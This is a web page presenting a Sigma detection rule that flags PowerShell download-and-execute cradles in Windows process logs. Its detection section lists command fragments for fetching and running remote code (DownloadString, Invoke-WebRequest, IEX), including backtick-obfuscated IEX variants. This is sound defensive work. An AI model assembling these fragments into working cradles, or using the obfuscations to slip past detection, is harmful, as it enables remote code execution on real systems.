PowerShell Download and Execution Cradles

calendar Mar 1, 2024 · attack.execution attack.t1059  ·
Share on: linkedin copy

Detects PowerShell download and execution cradles.

Sigma rule (View on GitHub)

 1title: PowerShell Download and Execution Cradles
 2id: 85b0b087-eddf-4a2b-b033-d771fa2b9775
 3status: test
 4description: Detects PowerShell download and execution cradles.
 5references:
 6    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
 7    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 8author: Florian Roth (Nextron Systems)
 9date: 2022/03/24
10modified: 2023/05/04
11tags:
12    - attack.execution
13    - attack.t1059
14logsource:
15    product: windows
16    category: process_creation
17detection:
18    selection_download:
19        CommandLine|contains:
20            - '.DownloadString('
21            - '.DownloadFile('
22            - 'Invoke-WebRequest '
23            - 'iwr '
24    selection_iex:
25        CommandLine|contains:
26            - ';iex $'
27            - '| IEX'
28            - '|IEX '
29            - 'I`E`X'
30            - 'I`EX'
31            - 'IE`X'
32            - 'iex '
33            - 'IEX ('
34            - 'IEX('
35            - 'Invoke-Expression'
36    condition: all of selection_*
37falsepositives:
38    - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
39level: high

References

Related rules

to-top